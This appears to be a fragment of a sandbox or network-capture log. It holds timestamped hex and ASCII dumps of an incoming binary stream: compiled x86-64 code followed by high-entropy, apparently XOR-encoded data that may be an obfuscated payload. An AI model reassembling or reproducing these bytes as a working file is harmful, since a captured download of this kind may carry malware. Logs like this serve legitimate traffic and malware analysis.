2022-11-07 22:49:04 UTC	4984	IN	Data Raw: 48 8d 0d 36 e1 29 00 48 89 48 38 e9 37 fb ff ff e8 b8 25 00 00 48 8b 50 10 48 8b 06 e9 e2 fa ff ff e8 a7 25 00 00 49 89 c0 48 8b 06 49 83 78 10 00 0f 84 e6 fc ff ff 48 85 c0 0f 85 5d fa ff ff e8 88 25 00 00 48 8b 50 10 48 8b 06 e9 d7 fc ff ff 48 85 c0 0f 85 50 fc ff ff e8 6e 25 00 00 49 89 c0 48 8b 06 49 83 78 10 00 0f 84 45 fc ff ff 48 85 c0 0f 85 d0 fc ff ff e8 4f 25 00 00 48 8b 50 10 48 8b 06 e9 36 fc ff ff 48 8b 06 48 85 c0 0f 85 a2 fa ff ff e8 32 25 00 00 49 89 c0 48 8b 06 49 83 78 38 00 0f 84 54 ff ff ff 48 85 c0 0f 85 8e fa ff ff e8 13 25 00 00 e9 84 fa ff ff 48 85 c0 0f 85 70 fa ff ff eb cc 48 8b 06 e9 9b f5 ff ff 48 8b 06 e9 fb f5 ff ff 48 8b 50 40 e9 c2 f6 ff ff 66 2e 0f 1f 84 00 00 00 00 00 41 57 41 56 41 55 41 54 55 57 56 53 48 83 ec 28 48 8b Data Ascii: H6)HH87%HPH%IHIxH]%HPHHPn%IHIxEHO%HPH6HH2%IHIx8TH%HpHHHP@f.AWAVAUATUWVSH(H
2022-11-07 22:49:04 UTC	5000	IN	Data Raw: 74 13 48 85 d2 74 0e 31 c0 c7 02 00 00 00 00 c3 0f 1f 44 00 00 b8 16 00 00 00 c3 66 90 48 85 c9 74 0b 31 c0 85 d2 75 05 c3 0f 1f 40 00 b8 16 00 00 00 c3 66 2e 0f 1f 84 00 00 00 00 00 41 54 55 57 56 53 48 83 ec 20 b8 16 00 00 00 41 89 ca 4c 89 cf 4c 89 c1 41 83 fa 02 77 66 83 e2 01 75 6d e8 08 e9 ff ff 48 89 c6 bd 9f 86 01 00 eb 0e 66 0f 1f 44 00 00 48 29 c3 48 01 de 74 2e 48 81 fe 9f 86 01 00 49 89 ec 4c 0f 42 e6 e8 8d e8 ff ff 44 89 e1 48 89 c3 e8 42 cf ff ff e8 7d e8 ff ff 48 89 c2 48 29 da 48 39 d6 77 ca 31 c0 48 85 ff 74 0f 48 c7 07 00 00 00 00 48 c7 47 08 00 00 00 00 48 83 c4 20 5b 5e 5f 5d 41 5c c3 90 e8 cb e8 ff ff 48 89 c6 eb 91 66 0f 1f 44 00 00 48 85 c9 74 1b 83 fa 01 77 16 c7 01 00 00 00 00 b8 28 00 00 00 74 02 31 c0 c3 66 0f 1f 44 00 00 b8 16 Data Ascii: tHt1DfHt1u@f.ATUWVSH ALLAwfumHfDH)Ht.HILBDHB}HH)H9w1HtHHGH [^_]A\HfDHtw(t1fD
2022-11-07 22:49:04 UTC	5016	IN	Data Raw: 38 45 8b 48 08 41 c7 40 10 ff ff ff ff 49 89 d2 85 c9 74 49 c6 44 24 2c 2d 48 8d 4c 24 2d 4c 8d 5c 24 2c 41 83 e1 20 31 d2 41 0f b6 04 12 83 e0 df 44 09 c8 88 04 11 48 83 c2 01 48 83 fa 03 75 e8 48 8d 51 03 4c 89 d9 4c 29 da e8 1d fe ff ff 90 48 83 c4 38 c3 0f 1f 80 00 00 00 00 41 f7 c1 00 01 00 00 74 17 c6 44 24 2c 2b 48 8d 4c 24 2d 4c 8d 5c 24 2c eb ac 66 0f 1f 44 00 00 41 f6 c1 40 74 1a c6 44 24 2c 20 48 8d 4c 24 2d 4c 8d 5c 24 2c eb 8f 66 0f 1f 84 00 00 00 00 00 4c 8d 5c 24 2c 4c 89 d9 e9 79 ff ff ff 0f 1f 00 41 54 53 48 83 ec 38 83 79 14 fd 49 89 cc 74 20 0f b7 49 18 4c 89 e2 66 85 c9 75 05 b9 2e 00 00 00 48 83 c4 38 5b 41 5c e9 33 fd ff ff 0f 1f 00 48 c7 44 24 28 00 00 00 00 48 8d 5c 24 28 e8 3d 4b 00 00 48 8d 4c 24 26 49 89 d9 41 b8 10 00 00 00 48 Data Ascii: 8EHA@ItID$,-HL$-L\$,A 1ADHHuHQLL)H8AtD$,+HL$-L\$,fDA@tD$, HL$-L\$,fL\$,LyATSH8yIt ILfu.H8[A\3HD$(H\$(=KHL$&IAH
2022-11-07 22:49:04 UTC	5032	IN	Data Raw: 2a 00 48 8b 44 24 28 eb b2 0f 1f 40 00 89 d9 be 01 00 00 00 48 8b 05 a2 21 29 00 4c 8d 05 eb 0a 2a 00 d3 e6 48 63 d6 48 89 c1 48 8d 14 95 23 00 00 00 4c 29 c1 48 c1 ea 03 48 c1 f9 03 89 d2 48 01 d1 48 81 f9 20 01 00 00 0f 87 32 ff ff ff 48 8d 14 d0 48 89 15 63 21 29 00 e9 4d ff ff ff 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 41 54 48 83 ec 20 49 89 cc 48 85 c9 74 3a 83 79 08 09 7e 0c 48 83 c4 20 41 5c e9 b9 0b 00 00 90 31 c9 e8 a9 fd ff ff 49 63 54 24 08 48 8d 05 6d 13 2a 00 83 3d b6 13 2a 00 02 48 8b 0c d0 4c 89 24 d0 49 89 0c 24 74 08 48 83 c4 20 41 5c c3 90 48 8d 0d a9 13 2a 00 48 83 c4 20 41 5c 48 ff 25 44 1a 2a 00 66 66 2e 0f 1f 84 00 00 00 00 00 90 41 55 41 54 56 53 48 83 ec 28 8b 71 14 49 89 cc 49 63 d8 48 63 ca 31 d2 0f 1f 84 00 00 00 00 00 41 8b Data Ascii: HD$(@H!)LHcHH#L)HHHH 2HHc!)Mff.ATH IHt:y~H A\1IcT$Hm=HL$I$tH A\HH A\H%Dff.AUATVSH(qIIcHc1A
2022-11-07 22:49:04 UTC	5048	IN	Data Raw: cc ff ff 48 85 c0 74 e5 4c 89 e0 48 83 c4 28 5b 5e 5f 41 5c c3 0f 1f 84 00 00 00 00 00 49 c7 c4 ff ff ff ff 4c 89 e0 48 83 c4 28 5b 5e 5f 41 5c c3 90 90 90 90 90 90 90 90 90 90 90 90 41 54 57 56 53 48 83 ec 28 48 8b 41 08 48 8b 5a 08 4d 89 c4 48 85 c0 74 47 48 85 db 74 42 48 83 e8 01 48 8b 3a 48 8b 31 49 39 c0 4c 0f 47 e0 eb 0d 0f 1f 80 00 00 00 00 49 83 ec 01 72 15 42 0f be 14 26 49 89 d8 48 89 f9 e8 8a cb ff ff 48 85 c0 74 e5 4c 89 e0 48 83 c4 28 5b 5e 5f 41 5c c3 49 c7 c4 ff ff ff ff 4c 89 e0 48 83 c4 28 5b 5e 5f 41 5c c3 90 90 90 90 90 90 90 90 90 90 90 90 48 c7 c0 ff ff ff ff 4c 8b 49 08 4d 85 c9 74 1b 49 8d 41 ff 48 8b 09 49 39 c0 49 0f 46 c0 66 90 3a 14 01 74 06 48 83 e8 01 73 f5 c3 90 90 90 90 48 8d 41 10 c3 90 90 90 90 90 90 90 90 90 90 90 41 54 Data Ascii: HtLH([^_A\ILH([^_A\ATWVSH(HAHZMHtGHtBHH:H1I9LGIrB&IHHtLH([^_A\ILH([^_A\HLIMtIAHI9IFf:tHsHAAT
2022-11-07 22:49:04 UTC	5064	IN	Data Raw: 56 53 48 83 ec 28 4c 8b 22 48 8b 72 08 4c 89 e0 48 01 f0 48 89 cf 74 05 4d 85 e4 74 5a 48 89 f1 31 d2 e8 16 e6 ff ff 48 89 c3 48 8d 48 18 48 83 fe 01 74 39 48 85 f6 75 24 c7 43 10 00 00 00 00 48 89 33 c6 44 33 18 00 48 89 0f 48 83 c4 28 5b 5e 5f 41 5c c3 0f 1f 84 00 00 00 00 00 49 89 f0 4c 89 e2 e8 9d 8b ff ff 48 89 c1 eb cc 41 0f b6 04 24 88 43 18 eb c2 48 8d 0d 2f cb 28 00 e8 8a 98 00 00 90 90 90 90 90 90 90 90 90 90 53 48 83 ec 20 48 89 cb b9 19 00 00 00 e8 8e 8d 00 00 48 c7 40 08 00 00 00 00 48 83 c0 18 c7 40 f8 00 00 00 00 48 c7 40 e8 00 00 00 00 c6 00 00 48 89 03 48 83 c4 20 5b c3 90 90 90 90 90 90 90 55 57 56 53 48 83 ec 28 48 89 d3 48 89 cd 44 89 c7 31 d2 48 89 d9 4d 89 c8 e8 52 e5 ff ff 48 89 c6 48 8d 48 18 48 85 db 74 15 48 83 fb 01 74 30 40 0f Data Ascii: VSH(L"HrLHHtMtZH1HHHHt9Hu$CH3D3HH([^_A\ILHA$CH/(SH HH@H@H@HH [UWVSH(HHD1HMRHHHHtHt0@
2022-11-07 22:49:04 UTC	5080	IN	Data Raw: 04 24 88 43 10 eb a4 90 90 90 90 90 90 56 53 48 83 ec 28 48 8b 41 08 48 89 cb 4c 89 c6 4a 8d 0c 02 49 89 c0 49 29 c8 74 23 48 85 f6 74 1e 48 03 0b 48 03 13 49 89 c9 48 89 d1 49 83 f8 01 74 25 4c 89 ca e8 b5 4b ff ff 48 8b 43 08 48 8b 13 48 29 f0 48 89 43 08 c6 04 02 00 48 83 c4 28 5b 5e c3 0f 1f 40 00 41 0f b6 01 88 02 48 8b 43 08 eb db 90 90 90 90 90 90 90 90 90 90 90 90 48 8b 41 08 48 8d 50 ff 48 89 51 08 48 8b 11 c6 44 02 ff 00 c3 90 90 90 90 90 90 90 90 90 90 90 41 54 53 48 83 ec 38 4c 8b 51 08 49 89 cc 48 8b 09 4b 8d 1c 02 49 8d 44 24 10 48 39 c1 74 59 49 8b 44 24 10 48 39 c3 77 2f 4d 85 c0 74 12 4c 01 d1 49 83 f8 01 74 49 e8 2c 4b ff ff 49 8b 0c 24 4c 89 e0 49 89 5c 24 08 c6 04 19 00 48 83 c4 38 5b 41 5c c3 0f 1f 40 00 4c 89 44 24 20 49 89 d1 4c 89 Data Ascii: $CVSH(HAHLJII)t#HtHHIHIt%LKHCHH)HCH([^@AHCHAHPHQHDATSH8LQIHKID$H9tYID$H9w/MtLItI,KI$LI\$H8[A\@LD$ IL
2022-11-07 22:49:04 UTC	5096	IN	Data Raw: 48 8d 41 10 48 89 01 e9 e1 d9 ff ff 90 45 31 c9 48 8d 41 10 48 89 01 e9 b1 da ff ff 90 4c 8b 01 48 83 c1 10 49 39 c8 74 0c 4c 89 c1 e9 dc 0d 00 00 0f 1f 40 00 c3 90 90 90 90 90 90 90 4c 8b 01 48 83 c1 10 49 39 c8 74 0c 4c 89 c1 e9 bc 0d 00 00 0f 1f 40 00 c3 90 90 90 90 90 90 90 41 54 53 48 83 ec 28 48 89 d3 48 8b 12 49 89 cc 48 8b 09 48 8d 43 10 4c 8b 43 08 48 39 d0 74 60 4d 8d 54 24 10 4c 8b 4b 10 4c 39 d1 74 3a 4d 8b 54 24 10 49 89 14 24 4d 89 44 24 08 4d 89 4c 24 10 48 85 c9 74 30 48 89 0b 4c 89 53 10 31 c0 48 c7 43 08 00 00 00 00 66 89 01 4c 89 e0 48 83 c4 28 5b 41 5c c3 0f 1f 00 49 89 14 24 4d 89 44 24 08 4d 89 4c 24 10 48 89 03 48 89 c1 eb cf 66 90 4d 85 c0 74 19 49 83 f8 01 74 25 4d 01 c0 e8 15 0b ff ff 49 8b 0c 24 4c 8b 43 08 48 8b 13 45 31 c9 4d Data Ascii: HAHE1HAHLHI9tL@LHI9tL@ATSH(HHIHHCLCH9t`MT$LKL9t:MT$I$MD$ML$Ht0HLS1HCfLH([A\I$MD$ML$HHfMtIt%MI$LCHE1M
2022-11-07 22:49:04 UTC	5112	IN	Data Raw: 66 d0 79 78 61 6f e5 7c 92 8f 62 6e 66 ec b9 07 0b 9d 43 69 6c 67 22 e0 79 11 75 77 63 89 e1 63 66 69 90 22 68 6f 6c ef b2 9b eb 47 66 68 fc b3 0d 27 98 3f 65 67 6a 85 ed 70 79 77 e6 a1 02 67 2e e4 75 4e 68 6f 6c 8c 53 54 64 6e 8e 3c 70 73 78 9d 3f 6c 6c 67 82 4f 7d 79 79 fc ab 89 8d 5a 66 69 90 42 68 6f 6c e0 ba 07 61 86 9b 44 79 73 90 7d 79 65 6c 8f 6d 66 74 79 fc b7 16 67 3e e8 a2 49 23 bb d8 68 6c 64 7a 9b 0f 67 66 68 b5 bf b4 3d f3 89 44 8f 75 64 74 79 4a b7 2b e2 b2 43 a5 21 fb 94 49 87 5f 6f 7a 73 8c a0 6e 68 79 f8 b0 3d f3 a1 44 8e 7d 5f 74 79 b5 bb af 29 ff 37 42 61 2f 30 e2 83 5c dd 7b 73 64 6e 8e 84 7c 73 78 f1 b0 6a e8 57 6b 6d 74 39 4b 88 23 e9 0a 4f 46 81 e3 7d 61 6f e6 bc f1 7e 9b 06 67 68 fa 8a 79 7a f4 78 6d 67 6a e8 bd 0c 33 b0 66 89 1e Data Ascii: fyxao\|bnfCilg"yuwccfi"holGfh'?egjpywg.uNholSTdn<psx?llgO}yyZfiBholaDys}yelmftyg>I#hldzgfh=DudtyJ+C!I_ozsnhy=D}_ty)7Ba/0\{sdn\|sxjWkmt9K#OF}ao~ghyzxmgj3f
2022-11-07 22:49:04 UTC	5128	IN	Data Raw: 9e 96 0d 7c 53 af 87 71 92 63 9b 91 99 20 fc b3 0d 7c 43 ac 84 6b 6a 6d 74 92 90 c7 62 29 f5 af 4e aa b4 b4 ad 27 ef 88 52 f8 69 60 7c 69 79 f0 81 8a 04 69 84 77 6c 6d 74 fa 74 8a 7a 60 76 94 d6 68 30 fb a5 47 af a8 b6 3b ed 32 42 78 31 fa 0c 51 68 30 3b 26 3c 25 f9 d5 5d 67 98 9e 89 23 e7 85 88 7d 61 6f 24 ef 7f f3 7d 6f 66 20 4a b7 30 fc f5 85 68 67 6a 2c ff 81 f2 85 e8 b8 f5 92 99 1d 7d 90 08 a6 93 9b 49 a1 2c e3 2a 4c 09 32 c0 ed 70 65 6c 8f 19 bf 8b 86 4a a5 2b ec 3b 7b 27 d1 a8 7c 61 6f 84 06 a8 8c 9b 26 eb 2c 5d 03 30 fc 34 41 24 2f e7 20 64 31 f4 32 73 29 ff 2f 42 39 87 6d 94 16 6c 64 36 f8 d1 66 67 68 79 3b f5 21 54 25 25 ec a4 28 47 b9 86 62 86 18 76 6b 2e ec b8 0c 57 27 ef 00 5e 4b 64 26 eb 24 5d 2b 30 fe 24 41 2c 2b e1 a5 3c f0 35 53 53 2c fd Data Ascii: \|Sqc \|Ckjmtb)N'Ri`\|iyiwlmttz`vh0G;2Bx1Qh0;&<%]g#}ao$}of J0hgj,}I,*L2pelJ+;{'\|ao&,]04A$/ d12s)/B9mld6fghy;!T%%(Gbvk.W'^Kd&$]+0$A,+<5SS,
2022-11-07 22:49:04 UTC	5144	IN	Data Raw: 27 66 ce 74 70 2e e4 60 6b fb 6e 26 eb 3a 78 3a fb 9d 71 10 84 2e e1 ba 3c f2 b7 3e e8 a5 89 7e 37 55 78 78 e4 af 12 49 37 f8 a2 27 ed bf 30 48 8f 01 52 29 e7 a9 27 46 bb 76 66 37 63 6e c0 69 27 66 ce 74 70 2e e4 60 6b fb 6e 26 eb 3a 78 3a fb 9d 71 10 84 2e e1 b0 3d f2 86 11 f3 29 4d 98 10 74 31 7b bf 27 57 ba 09 66 2c e5 b0 20 f2 b8 31 fe b4 9a 79 9b 51 6d 74 fc b9 09 86 8a 68 22 65 b7 31 43 be 18 7a 2c f1 a5 2c e5 ad 21 f2 b7 87 60 af 5e 6c 67 ef ad 0a 9c 76 68 63 29 fd 84 2f 42 86 30 5a 91 1a 77 32 f8 b2 26 ed a7 30 f8 bc 8a 65 db 57 67 6a e8 b4 06 9b 3f 58 9a 04 53 2b e2 be 30 ea b8 18 7a 36 f8 af 22 4d a7 76 c5 7a 34 7f d3 60 76 2b e5 70 68 f1 7d 2b ec 24 6a 2f ea 90 79 14 87 24 5f 8d 3b ef ad 2e 67 3c b5 30 fe 80 8c 09 98 95 92 3c 42 8c 04 43 28 5d Data Ascii: 'ftp.`kn&:x:q.<>~7UxxI7'0HR)'Fvf7cni'ftp.`kn&:x:q.=)Mt1{'Wf, 1yQmth"e1Cz,,!`^lgvhc)/B0Zw2&0eWgj?XS+0z6"Mvz4`v+ph}+$j/y$_;.g<0<BC(]
2022-11-07 22:49:04 UTC	5160	IN	Data Raw: 26 68 78 78 61 67 6c 64 7a 73 64 6e 66 58 a4 73 38 74 70 65 6c 75 6a 6d 74 79 79 77 63 29 ab 6b 26 68 78 78 61 73 6c 64 7a 73 64 6e 66 00 a4 73 38 74 70 65 6c 7a 6a 6d 74 79 79 77 63 e9 ab 6b 26 68 78 78 61 73 6c 64 7a 73 64 6e 66 c0 a4 73 38 74 70 65 6c 7a 6a 6d 74 79 79 77 63 a9 ab 6b 26 68 78 78 61 73 6c 64 7a 73 64 6e 66 80 a4 73 38 74 70 65 6c 44 6a 6d 74 79 79 77 63 71 a8 6b 26 68 78 78 61 75 6c 64 7a 73 64 6e 66 58 a7 73 38 74 70 65 6c 47 6a 6d 74 79 79 77 63 39 a8 6b 26 68 78 78 61 70 6c 64 7a 73 64 6e 66 10 a7 73 38 74 70 65 6c 41 6a 6d 74 79 79 77 63 c1 a8 6b 26 68 78 78 61 75 6c 64 7a 73 64 6e 66 a8 a7 73 38 74 70 65 6c 68 6a 6d 74 79 79 77 63 b1 a8 6b 26 68 78 78 61 6c 6c 64 7a 73 64 6e 66 bc a7 73 38 74 70 65 6c 62 6a 6d 74 79 79 77 63 81 a8 Data Ascii: &hxxagldzsdnfXs8tpelujmtyywc)k&hxxasldzsdnfs8tpelzjmtyywck&hxxasldzsdnfs8tpelzjmtyywck&hxxasldzsdnfs8tpelDjmtyywcqk&hxxauldzsdnfXs8tpelGjmtyywc9k&hxxapldzsdnfs8tpelAjmtyywck&hxxauldzsdnfs8tpelhjmtyywck&hxxalldzsdnfs8tpelbjmtyywc
2022-11-07 22:49:04 UTC	5176	IN	Data Raw: 26 68 78 78 61 fc 6c 64 7a 73 64 6e 66 f0 5c 72 38 74 70 65 6c 87 6a 6d 74 79 79 77 63 c9 53 6a 26 68 78 78 61 d4 6c 64 7a 73 64 6e 66 d0 5c 72 38 74 70 65 6c a9 6a 6d 74 79 79 77 63 a9 53 6a 26 68 78 78 61 8e 6c 64 7a 73 64 6e 66 b0 5c 72 38 74 70 65 6c bc 6a 6d 74 79 79 77 63 89 53 6a 26 68 78 78 61 b1 6c 64 7a 73 64 6e 66 90 5c 72 38 74 70 65 6c be 6a 6d 74 79 79 77 63 69 50 6a 26 68 78 78 61 a9 6c 64 7a 73 64 6e 66 c0 71 72 38 74 70 65 6c 44 6a 6d 74 79 79 77 63 79 50 6a 26 68 78 78 61 0a 6c 64 7a 73 64 6e 66 88 71 72 38 74 70 65 6c 4d 6a 6d 74 79 79 77 63 49 50 6a 26 68 78 78 61 03 6c 64 7a 73 64 6e 66 a8 71 72 38 74 70 65 6c 41 6a 6d 74 79 79 77 63 59 50 6a 26 68 78 78 61 07 6c 64 7a 73 64 6e 66 80 7e 72 38 74 70 65 6c 6d 6a 6d 74 79 79 77 63 29 50 Data Ascii: &hxxaldzsdnf\r8tpeljmtyywcSj&hxxaldzsdnf\r8tpeljmtyywcSj&hxxaldzsdnf\r8tpeljmtyywcSj&hxxaldzsdnf\r8tpeljmtyywciPj&hxxaldzsdnfqr8tpelDjmtyywcyPj&hxxaldzsdnfqr8tpelMjmtyywcIPj&hxxaldzsdnfqr8tpelAjmtyywcYPj&hxxaldzsdnf~r8tpelmjmtyywc)P
2022-11-07 22:49:04 UTC	5192	IN	Data Raw: 66 a9 1d 79 61 77 6c 64 7a 5d 0d 0a 07 1c 18 57 4b 75 70 65 6c bf 0f 6c 74 01 7b 77 63 4f 1f 0f 07 1d 19 5c 55 6f 6c 64 7a 23 0c 6f 66 ca 7c 73 78 5b 19 01 0d 13 0b 49 42 79 79 77 63 61 06 6a 66 99 71 78 61 41 08 05 0e 12 64 6e 66 98 00 72 78 f5 70 65 6c 49 0e 0c 00 18 5d 05 63 11 0c 6a 66 49 78 78 61 41 08 05 0e 12 40 1c 15 68 79 73 78 e5 0a 64 6c af 7b 6d 74 57 1b 04 10 61 76 6b 66 69 e8 79 61 47 62 64 7a 5d 14 0a 07 1c 18 73 78 75 d0 64 6c 3b 6b 6d 74 26 2b 33 22 35 37 6b 66 69 c8 79 61 df 6c 64 7a 5d 16 1d 14 0b 5d 43 49 75 70 65 6c d7 da 6c 74 a9 ef 74 63 4f 04 18 14 0a 5c 48 53 6f 6c 64 7a 73 64 6e 66 68 79 73 78 75 70 65 6c 67 6a 6d 74 79 79 77 63 61 76 6b 66 69 78 78 61 6f 6c 64 7a 73 64 6e 66 71 6c 71 78 73 02 67 5c fb a2 6d 74 41 79 77 63 40 73 Data Ascii: fyawldz]WKupellt{wcO\Uoldz#of\|sx[IByywcajfqxaAdnfrxpelI]cjfIxxaA@hysxdl{mtWavkfiyaGbdz]sxudl;kmt&+3"57kfiyaldz]]CIupellttcO\HSoldzsdnfhysxupelgjmtyywcavkfixxaoldzsdnfqlqxsg\mtAywc@s
2022-11-07 22:49:04 UTC	5208	IN	Data Raw: 66 6f 5e 53 71 7e 65 73 22 1b 77 67 77 61 68 74 47 cd 8e 9a 93 76 6e 45 62 79 79 71 45 68 5e 7d 66 69 7e 5e 66 47 7b 64 7a 75 42 b0 65 4e a7 73 52 34 6c 65 6c 67 6a 6d 74 79 79 77 63 0d 74 6b 66 05 7a 78 61 6c 6c 64 7a 7b 64 6e 67 76 7b 5b 43 75 70 6f 46 c9 14 6c 74 79 7d 5a 7d 13 43 6a 66 19 a8 7e 61 6f 6e 4c 46 73 64 64 09 55 79 73 72 06 4e 65 6c 6d ea 6c 74 79 7d 09 62 61 76 6f 4c 73 06 7a 61 6f 68 4e 64 71 e4 6c 66 68 7d 59 12 5d 6f 65 6c 61 18 16 75 79 09 09 61 61 76 6f 09 56 78 78 6b 1b 6d 64 7a 68 4e 04 4e 77 79 73 7e 07 ed 64 6c 17 14 6f 74 79 7d 18 5c 61 76 61 12 68 78 78 7a 45 6c 64 7a 31 37 24 24 69 79 72 78 75 70 65 6c 6b 6a 6d 74 0f 4b 59 53 4f 43 5b 51 5b 4f 78 61 6f 6c 61 7a 1f 64 6e 66 94 71 73 78 56 0e 65 6c 0f 63 6d 74 31 73 77 63 42 25 Data Ascii: fo^Sq~es"wgwahtGvnEbyyqEh^}fi~^fG{dzuBeNsR4lelgjmtyywctkfzxalldz{dngv{[CupoFlty}Z}Cjf~aonLFsddUysrNelmlty}bavoLszaohNdqlfh}Y]oelauyaavoVxxkmdzhNNwys~dloty}\avahxxzEldz17$$iyrxupelkjmtKYSOC[Q[OxaolazdnfqsxVelcmt1swcB%
2022-11-07 22:49:04 UTC	5224	IN	Data Raw: 77 58 19 2c e0 a9 bf d0 1b 43 06 de fb f2 fb e2 0a f4 40 85 ce fc 17 c4 67 d6 99 9b 99 f9 ca 8c ce f7 57 f7 9c 8d d7 e4 8d 8a 7b bf 8f fd 8f a3 a8 68 4d 68 a5 94 ef 6b 8a 5c e9 a8 53 ad 11 c9 96 5b 0f 04 9b b2 7d 87 37 74 fa 48 14 96 68 28 df f8 f8 4a 06 25 2d 78 9c 4a b6 de a7 12 5c ba 9a 30 59 32 b2 48 54 ca 44 46 db 26 ad fc 95 02 47 22 82 09 36 66 d5 8b 72 52 9b fe 83 ed 96 e0 96 2e 8a 64 5e e2 c3 3f a6 89 53 36 7d a3 ef 82 de 62 96 ec cd 8e 1f e7 c9 c7 45 70 f8 da 36 76 0f 27 f7 d0 ee 75 01 e7 24 58 d3 ce 5e 58 23 00 6b f5 b0 0e be 45 c0 18 cc 04 6f 7b 5f 82 92 ba ff 20 26 b3 54 cb e1 b0 3d 9f a8 7f be be 3e cc 03 a0 26 6c 8e e0 65 86 c3 53 f0 c7 1d c6 ea 9b 3c 02 38 fc cb 15 2a 87 00 9d 98 e8 6e 95 b9 47 4e b4 f5 5d 87 c4 a4 d5 9c ed 9a 66 e9 1e 06 Data Ascii: wX,C@gW{hMhk\S[}7tHh(J%-xJ\0Y2HTDF&G"6frR.d^?S6}bEp6v'u$X^X#kEo{_ &T=>&leS<8*nGN]f
2022-11-07 22:49:04 UTC	5240	IN	Data Raw: 6b 4f 1d 36 44 79 5d 4c c0 7f fa 4f a0 ee e7 b1 ea 9d f7 cd 4e b6 f5 44 de df f1 5a 09 91 d4 05 86 68 72 28 e1 d5 30 3a e9 55 73 cf fd 75 6d 7e 16 bf 66 14 0d 0f cb e8 02 a2 ef ee 9f b4 28 2d a2 3c 4c e5 4c 7f 8a 0d 27 a8 49 bc d1 ee d7 f9 51 fa 54 ee 3e 17 78 d8 b4 6d 26 4a 62 91 2d bc 88 3c 3e 46 ab cd 78 01 2b 3f 86 65 10 bd 6d a2 ba 66 5b 33 be 01 4d f7 44 65 e7 43 63 f7 c3 6b 99 e8 f0 69 e2 d7 1c 76 99 57 bd 46 38 f9 15 a7 d8 95 9e b4 06 dd be ed 54 c5 8d b2 2f cb d8 57 19 c8 6c bc ae bd f5 6c fb ff 88 06 85 86 6c 96 b3 1b 38 57 49 c5 8f 35 84 1b ed 9f 8d c8 8e 13 39 f3 3d b5 24 7f 82 51 df 4b 67 81 6e 41 b1 d6 d2 9f a2 d9 c9 22 76 98 82 0b 57 1c 3e d3 21 78 eb 44 47 6e bb 6b 00 8c 24 f4 72 34 31 d4 90 07 64 b7 bd 36 e9 3b 8e ed 2a 89 5b 2a 15 15 67 Data Ascii: kO6Dy]LONDZhr(0:Usum~f(-<LL'IQT>xm&Jb-<>Fx+?emf[3MDeCckivWF8T/Wlll8WI59=$QKgnA"vW>!xDGnk$r41d6;[g
2022-11-07 22:49:04 UTC	5256	IN	Data Raw: 80 4f 2c b8 cb 16 d2 32 76 78 d8 2e eb 2f bd 61 e6 4c 61 1d 10 26 5e b1 a7 f4 25 31 d6 c6 2e 6f 1d c3 8a f0 7f 8e ea d0 ee de 08 30 d6 1b 71 82 08 56 76 c6 b6 24 65 ac 54 23 93 66 4a 5a f2 33 e8 a5 73 dc 1b c9 78 54 21 1d 67 25 d6 50 f1 c5 65 7d 1f 62 07 63 01 8d 02 51 b6 33 fc e2 86 ce 4a ad b8 92 e3 be fb 70 b1 c5 a1 93 d3 1f 11 28 30 ca 60 18 ad 98 78 97 8e a2 ce 1a 82 2a ec 9a 5f 39 4e 15 ca 98 69 8a 61 8e 02 7e 0f 33 11 76 ce 58 ab 62 9e da f7 e4 aa b8 fc 71 78 8f 31 e9 98 1a 21 47 53 5d a3 b4 7c 8e e6 3e 1f 51 41 9e dc 01 17 0d 01 08 e7 dc bc 7c 42 8b 37 eb ba ca b5 ed ea 6e 99 9f ad 67 ad 69 c8 73 4d 92 77 7f b5 19 dc 75 18 27 fa 74 17 83 23 a3 cb 54 42 9f 7d 93 22 f0 41 ad c5 33 42 22 53 27 39 30 da b0 f9 d6 6b 22 1b 33 cd be d3 e3 df b8 b3 29 a1 Data Ascii: O,2vx./aLa&^%1.o0qVv$eT#fJZ3sxT!g%Pe}bcQ3Jp(0`x*_9Nia~3vXbqx1!GS]\|>QA\|B7ngisMwu't#TB}"A3B"S'90k"3)
2022-11-07 22:49:04 UTC	5272	IN	Data Raw: 85 b7 2f 46 65 e0 a2 90 9a 92 5d 64 b9 cd a8 96 d6 ae f0 3e 4d 37 93 65 5a 52 c1 18 0e 0e 94 c9 93 17 39 19 6a d8 b9 5c 60 fb e0 8e da 0c c5 79 b9 2b 28 14 23 fb ce 45 61 45 e9 8b a4 c6 63 38 9f 25 58 81 c3 a4 49 52 c9 c5 61 2f be 22 a3 cd f7 96 ef d2 4b 39 47 7a b6 d0 87 1f 09 9b fe b6 8e ad 4c 84 51 ae 95 58 7a e3 6b 03 ee 31 f7 da a2 33 99 9c 23 bc e7 46 63 a4 39 df 26 1a 35 a7 94 6b ff 31 a0 50 ad 1a 35 c3 e7 98 c1 27 31 55 a9 c5 f2 ab 66 15 65 a2 69 ab 9f 46 8c 62 ec 61 5c a0 fb 09 e6 ce 63 30 b0 16 d5 de 92 a7 c2 8e ec e9 61 9b 7e a4 d7 a9 92 2c f1 d8 66 43 80 8d 6a e7 26 9e 4b 6c 3c 1d 43 25 62 94 54 43 70 94 4f da 1d 47 13 03 3a dd b9 1d da 54 17 12 da fe 9f 57 5c 05 3c ad 2e 3a 23 fb 51 54 86 04 b5 67 71 23 06 70 dd d9 28 53 65 6f d3 a3 5d 77 f2 Data Ascii: /Fe]d>M7eZR9j\`y+(#EaEc8%XIRa/"K9GzLQXzk13#Fc9&5k1P5'1UfeiFba\c0a~,fCj&Kl<C%bTCpOG:TW\<.:#QTgq#p(Seo]w
2022-11-07 22:49:04 UTC	5288	IN	Data Raw: 10 d4 d9 3d a9 cc 1d b2 b0 45 a9 e1 56 a3 0b 1a 4d 4a a0 43 a7 26 f9 00 3b bb 62 e4 65 12 5b 2e 62 ba d4 36 3a 22 b6 cb 28 f2 57 82 49 4a 59 b6 ca e8 c7 6c 37 f1 87 c7 f7 1c 3e c9 8f 89 69 f3 08 82 a4 5a c7 84 55 bf fe 1e 21 69 c1 66 b2 d2 0e f2 d5 bf 9f 2d ac 29 f6 fc 1d 7b db 01 4f 72 75 9f 8b 5c 13 0c af 18 a5 42 1c 3d d9 b8 01 1f ac 60 3e 89 72 16 96 ab 00 ec cd ee c8 f6 83 c7 73 5e 53 0c 79 6a 32 90 fa 46 c5 03 8a e2 cc f6 58 16 65 7c e6 7b b9 a3 9f 49 d7 1a cb a2 f8 0f 4e 39 3c 38 87 20 3f fd dd 66 9a da 84 79 5a cf 58 f6 dd 54 6c c4 a5 ad e2 75 4c cb 9d b3 c4 75 7e eb 64 8e db 41 1d 11 24 d2 77 06 26 8c 33 2e b5 07 c5 9c bd 8a 9e 22 b9 c0 bd 40 01 26 22 94 f4 6f a1 54 cc 2e 15 c7 d2 9b a1 3e 